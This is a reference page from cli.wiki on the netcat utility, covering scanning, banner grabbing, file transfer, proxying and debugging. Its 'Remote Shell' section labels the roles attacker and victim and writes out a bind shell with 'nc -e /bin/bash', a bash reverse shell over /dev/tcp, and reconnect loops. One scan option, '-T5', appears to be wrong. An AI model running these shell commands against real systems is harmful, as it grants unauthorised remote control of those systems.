Overview

Netcat (nc) is a versatile networking utility for reading/writing data across network connections using TCP/UDP protocols. Often called the “Swiss Army knife” of networking tools.

Key Features

Port scanning
Port listening
File transfer
Network debugging
Port forwarding
Banner grabbing
Proxy functionality
Remote shell capabilities

Installation

Ubuntu (22.04/24.04)

# Traditional netcat
sudo apt install netcat-traditional
 
# OpenBSD netcat
sudo apt install netcat-openbsd

macOS

# Pre-installed on macOS
# Or install via Homebrew
brew install netcat

Basic Usage

Connection Testing

# Basic client connection
nc hostname port
 
# Listen for connections
nc -l port
 
# Verbose output
nc -v hostname port
 
# Very verbose output
nc -vv hostname port

TCP/UDP Connections

# TCP connection (default)
nc hostname port
 
# UDP connection
nc -u hostname port
 
# Force IPv4
nc -4 hostname port
 
# Force IPv6
nc -6 hostname port

Port Scanning

Basic Port Scanning

# Scan single port
nc -zv hostname port
 
# Scan port range
nc -zv hostname port-range
nc -zv hostname 20-100
 
# Scan multiple ports
nc -zv hostname 22 80 443

Advanced Scanning

# TCP scan with timeout
nc -zvw3 hostname port
 
# UDP scan
nc -zvu hostname port
 
# Fast scan
nc -zv -T5 hostname port-range

# Get service banner
echo "" | nc -v hostname port
 
# Grab HTTP header
echo "HEAD / HTTP/1.0\r\n\r\n" | nc hostname 80
 
# Extended banner grab
nc -v -w3 hostname port

File Transfer

Basic File Transfer

# Receiver
nc -l port > received_file
 
# Sender
nc hostname port < file_to_send

Directory Transfer

# Receiver
nc -l port | tar xvf -
 
# Sender
tar cvf - directory | nc hostname port

With Progress

# Receiver
nc -l port | pv > received_file
 
# Sender
pv file_to_send | nc hostname port

Remote Shell

Basic Shell Access

# Listener (attacker)
nc -l port -v
 
# Target (victim)
nc hostname port -e /bin/bash

Reverse Shell

# Listener
nc -l port -v
 
# Sender
/bin/bash -i >& /dev/tcp/hostname/port 0>&1

Persistent Connection

# Listener with reconnect
while true; do nc -l port; done
 
# Sender with reconnect
while true; do nc hostname port; sleep 1; done

Proxy and Redirection

Port Forwarding

# Local port forward
nc -l local_port | nc remote_host remote_port
 
# With bidirectional communication
mkfifo backpipe
nc -l local_port < backpipe | nc remote_host remote_port > backpipe

Proxy Server

# Simple proxy
nc -l local_port | tee -a logfile | nc remote_host remote_port
 
# With logging
nc -l local_port | tee -a logfile | nc remote_host remote_port | tee -a logfile

Advanced Usage

Custom Protocols

# HTTP GET request
echo -e "GET / HTTP/1.0\r\n\r\n" | nc web_server 80
 
# SMTP interaction
nc mail_server 25 << EOF
HELO example.com
QUIT
EOF

Debugging

# Debug web server
nc -l 80 -v -k
 
# Debug mail server
nc -l 25 -v
 
# Monitor connections
nc -l port -v | tee connection.log

Encryption

# Using with SSL/TLS
nc -v hostname port | openssl s_client -connect hostname:port
 
# Encrypted file transfer
# Sender
tar czf - files | openssl enc -e -aes256 | nc hostname port
 
# Receiver
nc -l port | openssl enc -d -aes256 | tar xzf -

Security Considerations

Access Control

# Limit connection attempts
nc -l port -w timeout
 
# Allow only IPv4
nc -4 -l port
 
# Bind to specific interface
nc -l interface_ip port

Monitoring

# Log all connections
nc -l port -v 2>&1 | tee connection.log
 
# Monitor with timestamp
nc -l port -v 2>&1 | while read line; do echo "$(date): $line"; done

Best Practices

Connection Testing

# Test with timeout
nc -zv -w3 hostname port
 
# Verify service
nc -v hostname port < /dev/null
 
# Check UDP service
nc -zuv hostname port

File Transfer Safety

# Verify transfer
# Sender
md5sum file_to_send
cat file_to_send | nc hostname port
 
# Receiver
nc -l port | tee received_file | md5sum

Quick Reference

Essential Commands

# Listen mode
nc -l port
 
# Connect mode
nc hostname port
 
# Port scan
nc -zv hostname port
 
# File transfer
nc -l port > file    # Receiver
nc hostname port < file    # Sender

Common Options

-l    # Listen mode
-v    # Verbose
-w    # Timeout
-z    # Zero I/O mode (scanning)
-u    # UDP mode
-p    # Local port
-e    # Execute program

Example Use Cases

Web Server Testing

# Basic HTTP request
echo -e "GET / HTTP/1.0\r\n\r\n" | nc web_server 80
 
# Extended HTTP testing
cat << EOF | nc web_server 80
GET / HTTP/1.1
Host: web_server
User-Agent: netcat
Connection: close
 
EOF

Network Debugging

# Simple chat server
nc -l port    # Server
nc hostname port    # Client
 
# Port forwarding
nc -l local_port | nc remote_host remote_port

Remember:

Always consider security implications
Use timeouts for connections
Log important operations
Test in safe environment first
Document configurations
Monitor for abuse

For detailed information, consult the man pages (man nc).

cli.wiki

Explorer

Netcat (nc) Network Utility Guide

Table of Contents

Overview

Key Features

Installation

Ubuntu (22.04/24.04)

macOS

Basic Usage

Connection Testing

TCP/UDP Connections

Port Scanning

Basic Port Scanning

Advanced Scanning

Banner Grabbing

File Transfer

Basic File Transfer

Directory Transfer

With Progress

Remote Shell

Basic Shell Access

Reverse Shell

Persistent Connection

Proxy and Redirection

Port Forwarding

Proxy Server

Advanced Usage

Custom Protocols

Debugging

Encryption

Security Considerations

Access Control

Monitoring

Best Practices

Connection Testing

File Transfer Safety

Quick Reference

Essential Commands

Common Options

Example Use Cases

Web Server Testing

Network Debugging

Graph View

Table of Contents

Backlinks